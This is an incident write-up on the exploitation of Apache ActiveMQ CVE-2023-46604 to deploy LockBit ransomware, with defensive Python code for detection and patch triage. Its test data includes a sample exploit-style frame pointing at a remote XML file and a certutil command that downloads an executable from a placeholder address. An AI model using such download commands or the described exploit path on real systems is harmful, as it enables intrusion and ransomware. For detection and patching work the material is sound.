Apache ActiveMQ Vulnerability Exploited to Deliver LockBit Ransomware, Urgent Patch Advised

Critical Apache ActiveMQ Vulnerability Exploited to Deploy LockBit Ransomware

A severe security flaw in Apache ActiveMQ, tracked as CVE-2023-46604, has been actively exploited to infiltrate enterprise networks and deploy LockBit ransomware. The vulnerability, rated CVSS 10.0, sits in the OpenWire protocol that the broker exposes by default on TCP port 61616: when unmarshalling a Throwable, the broker instantiates whatever class name the client supplies through that class's String-argument constructor. An unauthenticated attacker can name a Spring class such as ClassPathXmlApplicationContext and pass the URL of a remote XML bean-definition file, which the broker then fetches and executes, giving remote code execution (RCE) with the privileges of the broker's service account.

Initial Exploitation and Attack Progression

The attack commenced in mid-February 2024 when the threat actors targeted a publicly accessible Apache ActiveMQ server. By sending a specially crafted OpenWire command they exploited CVE-2023-46604 and caused the broker to fetch and load a Spring XML bean-definition file from an attacker-controlled web server. That file instructed the compromised host to download a Metasploit stager with the Windows certutil.exe utility. Once executed, the stager established a command-and-control (C2) channel to an attacker-controlled server at 166.62.100[.]52.
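As an added example, not code from the original report or from the Apache project: a heuristic inspector for OpenWire frames that flags the pattern the exploit depends on, a Spring application-context class name carried where a Throwable's class name belongs, together with a remote location for it to load. The set of class names, the treatment of wire strings as 16-bit length-prefixed ASCII, and the sample frames are the example's own assumptions; the sample frames are constructed test input, not captured traffic and not working commands.

```python
import re
import struct
from dataclasses import dataclass, field
from typing import List

# Spring classes publicly reported as abused through the OpenWire Throwable
# unmarshalling path: each has a String-argument constructor whose argument is a
# location (URL or path) from which XML bean definitions are loaded and run.
# Assumption: this set is illustrative, not a complete list of reachable classes.
DANGEROUS_CLASSES = {
    "org.springframework.context.support.ClassPathXmlApplicationContext",
    "org.springframework.context.support.FileSystemXmlApplicationContext",
}
EXCEPTION_RESPONSE = 31  # OpenWire command type that carries a Throwable
LOCATION_RE = re.compile(r"^(?:https?|ftp|file)://", re.IGNORECASE)


@dataclass
class Finding:
    command_type: int
    strings: List[str] = field(default_factory=list)
    dangerous_classes: List[str] = field(default_factory=list)
    remote_locations: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.dangerous_classes)


def prefixed_ascii_strings(payload: bytes, min_len: int = 8) -> List[str]:
    """Recover 16-bit big-endian length-prefixed ASCII strings from a payload.

    OpenWire writes ASCII String fields as a 2-byte length followed by the
    bytes in both its tight and loose encodings, so a class name or URL carried
    in a command appears as such a run. This is a heuristic scan: it does not
    decode the command structure, it only finds runs that fit the pattern.
    """
    found: List[str] = []
    i = 0
    while i + 2 <= len(payload):
        n = struct.unpack_from(">H", payload, i)[0]
        end = i + 2 + n
        if n >= min_len and end <= len(payload):
            chunk = payload[i + 2:end]
            if all(0x20 <= b < 0x7F for b in chunk):
                found.append(chunk.decode("ascii"))
                i = end
                continue
        i += 1
    return found


def inspect_frame(frame: bytes) -> Finding:
    """Check one size-prefixed OpenWire frame for the CVE-2023-46604 pattern:
    a dangerous class name plus a remote location for it to load."""
    if len(frame) < 5:
        raise ValueError("frame too short for a size prefix and command type")
    declared = struct.unpack_from(">I", frame, 0)[0]
    if declared != len(frame) - 4:
        raise ValueError(f"size prefix {declared} != payload length {len(frame) - 4}")
    finding = Finding(command_type=frame[4], strings=prefixed_ascii_strings(frame[5:]))
    for s in finding.strings:
        if s in DANGEROUS_CLASSES:
            finding.dangerous_classes.append(s)
        elif LOCATION_RE.match(s):
            finding.remote_locations.append(s)
    return finding


def _utf(s: str) -> bytes:
    return struct.pack(">H", len(s)) + s.encode("ascii")


def build_sample_frame(class_name: str, message: str) -> bytes:
    """Constructed test input, not a captured packet and not a working command:
    only the size prefix, the type byte and the two length-prefixed strings
    follow the wire format; the bytes between them are filler."""
    body = bytes([EXCEPTION_RESPONSE]) + b"\x00" * 6 + _utf(class_name) + _utf(message)
    return struct.pack(">I", len(body)) + body


if __name__ == "__main__":
    hostile = build_sample_frame(
        "org.springframework.context.support.ClassPathXmlApplicationContext",
        "http://198.51.100.7/poc.xml",  # documentation-range address, made up
    )
    benign = build_sample_frame("java.lang.IllegalStateException", "Connection refused by broker")
    for name, frame in (("hostile", hostile), ("benign", benign)):
        f = inspect_frame(frame)
        print(name, "suspicious" if f.suspicious else "clean", f.dangerous_classes, f.remote_locations)
```

Run it over the payload of a connection to the OpenWire port (for instance a stream carved by Zeek or Suricata). A frame whose strings include one of the class names is hostile whatever the command type byte says, since no legitimate client reports a Spring context class as an exception type, and the remote location it extracts is the address of the XML file to block at the egress firewall and hunt for in proxy logs.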

Within 40 minutes of initial access the attackers had escalated to SYSTEM on the broker host and begun extracting credentials from the memory of the Local Security Authority Subsystem Service (LSASS) process. The speed of that escalation reflects both the severity of the vulnerability and the practised tooling of the operators.

Persistence and Re-Exploitation

Although the attackers were detected and evicted on the second day of the intrusion, the vulnerable ActiveMQ server was never patched. Eighteen days later the threat actors exploited CVE-2023-46604 again, changing nothing but the names of the files they downloaded after exploitation. They also still held credentials stolen during the first intrusion, specifically those of a privileged service account, which gave them direct access to the network independently of the exposed broker.

Lateral Movement and Ransomware Deployment

Upon re-entry, the attackers confirmed that they held domain administrator access and used a disguised network scanning tool to enumerate live hosts in the environment. They then copied the LockBit executables, LB3.exe and LB3_pass.exe, to servers and workstations over Remote Desktop Protocol (RDP) sessions. On file and backup servers the ransomware was run from the command line with explicit path and password arguments; on other hosts it was launched interactively from Windows Explorer.

The ransom notes directed victims to the Session private messaging app rather than to official LockBit infrastructure, which suggests the attackers may have built their payload with the leaked LockBit Black builder. The total time from initial exploitation to full encryption was approximately 19 days, most of it the gap between the first eviction and the return through the still-unpatched broker.

Credential Theft and Lateral Movement Techniques

After gaining SYSTEM on the initially compromised host, the attackers accessed LSASS process memory on four separate hosts during the first intrusion phase. System Monitor (Sysmon) Event ID 10 (ProcessAccess) records captured a GrantedAccess value of 0x1010, that is PROCESS_VM_READ (0x0010) combined with PROCESS_QUERY_LIMITED_INFORMATION (0x1000), the minimum needed to read another process's memory, together with an UNKNOWN entry in the CallTrace field. UNKNOWN means Sysmon could not map a return address on the calling stack to any module on disk, so the handle was opened from unbacked memory such as injected or reflectively loaded code. That is consistent with a Metasploit stager operating in memory and leaves no on-disk dumping tool for responders to find.
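The following is an added example, not tooling from the incident write-up. It runs the two host-level detections suggested by the certutil download in the initial-exploitation section and by the LSASS access described here, over a handful of constructed Sysmon events (Event ID 1 process creation and Event ID 10 process access). The events, paths, addresses and CallTrace values are made up for the example; the access-mask constants come from the Windows SDK.

```python
import re
from typing import Dict, FrozenSet, Iterable, List, Optional, Tuple

# Process access-mask bits (Windows SDK); 0x1010 is the combination of the two.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

JAVA_IMAGES = {"java.exe", "javaw.exe"}
SHELLS_AND_DOWNLOADERS = {"cmd.exe", "powershell.exe", "certutil.exe", "bitsadmin.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

Event = Dict[str, object]
Alert = Tuple[str, str]  # (severity, description)


def _basename(path: object) -> str:
    return str(path).replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process_create(ev: Event) -> Optional[Alert]:
    """Sysmon Event ID 1. Flags the broker's JVM spawning a shell or downloader
    (the attacker's XML runs a command), and certutil fetching a URL from any
    parent, since the stager download may sit one cmd.exe hop below java.exe."""
    if ev.get("EventID") != 1:
        return None
    child = _basename(ev.get("Image", ""))
    parent = _basename(ev.get("ParentImage", ""))
    cmdline = str(ev.get("CommandLine", ""))
    if parent in JAVA_IMAGES and child in SHELLS_AND_DOWNLOADERS:
        return ("high", f"{parent} spawned {child}: {cmdline}")
    urls = URL_RE.findall(cmdline)
    if child == "certutil.exe" and urls:
        return ("high", f"certutil.exe (parent {parent}) fetching {urls[0]}")
    return None


def check_process_access(ev: Event, allowlist: FrozenSet[str] = frozenset()) -> Optional[Alert]:
    """Sysmon Event ID 10. Flags handles to lsass.exe that include
    PROCESS_VM_READ. An UNKNOWN entry in CallTrace is a return address Sysmon
    could not map to a module on disk, i.e. the open came from unbacked memory
    such as injected or reflectively loaded code, so it is rated higher than
    the same mask requested from a module-backed call stack."""
    if ev.get("EventID") != 10:
        return None
    if _basename(ev.get("TargetImage", "")) != "lsass.exe":
        return None
    source = _basename(ev.get("SourceImage", ""))
    if source in allowlist:
        return None
    granted = int(str(ev.get("GrantedAccess", "0x0")), 16)  # Sysmon logs hex text
    if not granted & PROCESS_VM_READ:
        return None
    unbacked = "UNKNOWN" in str(ev.get("CallTrace", ""))
    note = " from unbacked memory (CallTrace UNKNOWN)" if unbacked else ""
    return ("high" if unbacked else "medium", f"{source} opened lsass.exe with {granted:#06x}{note}")


def triage(events: Iterable[Event], allowlist: FrozenSet[str] = frozenset()) -> List[Alert]:
    """Run both checks over a stream of parsed Sysmon events."""
    alerts: List[Alert] = []
    for ev in events:
        for alert in (check_process_create(ev), check_process_access(ev, allowlist)):
            if alert is not None:
                alerts.append(alert)
    return alerts


# Constructed sample events for the example; paths, addresses and CallTrace
# values are made up and are not artifacts from the incident.
SAMPLE_EVENTS: List[Event] = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\ActiveMQ\jre\bin\java.exe",
     "CommandLine": r"cmd.exe /c certutil -urlcache -split -f http://198.51.100.7/x.exe C:\Users\Public\x.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -urlcache -split -f http://198.51.100.7/x.exe C:\Users\Public\x.exe"},
    {"EventID": 10, "SourceImage": r"C:\Users\Public\x.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|UNKNOWN(000001A2B3C4D5E6)"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|C:\Windows\System32\KERNELBASE.dll+2c0a5"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd.exe"},
]

if __name__ == "__main__":
    for severity, description in triage(SAMPLE_EVENTS, allowlist=frozenset({"msmpeng.exe"})):
        print(f"[{severity}] {description}")
```

The allowlist exists because security and inventory agents legitimately open LSASS with 0x1010 from module-backed call stacks; tune it per environment rather than suppressing the rule, and never allowlist an opener whose CallTrace contains UNKNOWN.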

One of the targeted hosts was running a production application under a privileged service account. Its credentials became the bridge the threat actors used to re-enter the network in the second phase of the attack. Credential theft followed by reuse after eviction underscores the need to rotate privileged credentials as part of containment and to monitor where they are used afterwards.

Mitigation and Recommendations

To protect against such exploits, organizations should take the following steps:

1. Patch Management: Immediately apply the security updates provided by Apache for CVE-2023-46604. Upgrading to 5.15.16, 5.16.7, 5.17.6, or 5.18.3 (or any later release in the branch) removes the vulnerability. Confirm the version the running broker actually reports rather than the package that was downloaded; the server in this case stayed exploitable for more than two weeks after the first eviction.

2. Network Security: The OpenWire listener (TCP 61616 by default) should never be reachable from the Internet. Restrict it with firewall rules to the application hosts that legitimately produce and consume messages, and limit outbound connections from the broker host, since the exploit depends on the broker fetching a remote XML file and the stager then beaconing out.

3. Monitoring and Detection: Alert on the behaviours seen in this intrusion rather than on generic anomalies: the broker's java.exe spawning cmd.exe, powershell.exe or certutil.exe; certutil.exe fetching a URL; Sysmon Event ID 10 opens of lsass.exe with read access, especially with UNKNOWN in the CallTrace; and new outbound connections from the broker host to unfamiliar addresses.

4. Credential Security: After any intrusion, rotate every credential that could have been exposed on hosts where LSASS was accessed, privileged service accounts first, and watch for the old values being tried. Routine audits and rotation limit how long a stolen credential stays useful.

5. Incident Response Planning: Build eviction and root-cause remediation into the same playbook. Removing the attacker's tooling without patching or isolating the entry point, as happened on day two here, only buys time until the next exploitation attempt.
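An added example, not from the page or from the ActiveMQ project: a version triage helper that applies the branch-specific fix versions above, including to the jar names found in an installation's lib/ directory. The jar-name pattern, the constructed listing, and the assumption that anything at or above 5.18.3 carries the fix are the example's own.

```python
import re
from typing import Dict, Iterable, Tuple

Version = Tuple[int, int, int]

# Fixed releases for CVE-2023-46604, keyed by maintenance branch.
FIXED_BY_BRANCH: Dict[Tuple[int, int], Version] = {
    (5, 15): (5, 15, 16),
    (5, 16): (5, 16, 7),
    (5, 17): (5, 17, 6),
    (5, 18): (5, 18, 3),
}
OLDEST_FIX: Version = min(FIXED_BY_BRANCH.values())
NEWEST_FIX: Version = max(FIXED_BY_BRANCH.values())

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")
# Jar names as laid out in an ActiveMQ installation's lib/ directory.
# Assumption: these artifact ids are enough to identify the broker build;
# extend the alternation if a deployment repackages the jars.
_JAR_RE = re.compile(r"^activemq-(?:all|broker|client|openwire-legacy)-(\d+\.\d+\.\d+)\.jar$")


def parse_version(text: str) -> Version:
    m = _VERSION_RE.search(text)
    if m is None:
        raise ValueError(f"no x.y.z version in {text!r}")
    major, minor, patch = (int(g) for g in m.groups())
    return (major, minor, patch)


def is_vulnerable(version: str) -> bool:
    """True when the release predates the fix for its own branch.

    Branches older than 5.15 never received a fix, so anything below 5.15.16
    is vulnerable. Assumption (not stated on the page): every release at or
    above 5.18.3, including later major branches, carries the fix.
    """
    v = parse_version(version)
    if v < OLDEST_FIX:
        return True
    if v >= NEWEST_FIX:
        return False
    fixed = FIXED_BY_BRANCH.get(v[:2])
    if fixed is None:
        return True  # fail closed for an unlisted branch between 5.15 and 5.18
    return v < fixed


def assess_lib_listing(filenames: Iterable[str]) -> Dict[str, bool]:
    """Map every ActiveMQ jar in a lib/ listing to whether it is vulnerable."""
    result: Dict[str, bool] = {}
    for name in filenames:
        m = _JAR_RE.match(name)
        if m is not None:
            result[name] = is_vulnerable(m.group(1))
    return result


# Constructed directory listing for the example, not taken from the incident.
SAMPLE_LIB_LISTING = [
    "activemq-broker-5.17.3.jar",
    "activemq-client-5.17.3.jar",
    "activemq-openwire-legacy-5.17.3.jar",
    "spring-context-5.3.23.jar",
    "jetty-server-9.4.51.v20230217.jar",
]

if __name__ == "__main__":
    for jar, vulnerable in assess_lib_listing(SAMPLE_LIB_LISTING).items():
        print(f"{jar}: {'VULNERABLE, upgrade' if vulnerable else 'fixed'}")
```

Feed it the listing from the broker that is actually serving port 61616, not from a package staged for deployment; an upgrade that was unpacked but never restarted leaves the old JVM, and the vulnerable unmarshaller, running.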

By proactively addressing these areas, organizations can significantly reduce the risk of exploitation and enhance their overall cybersecurity posture.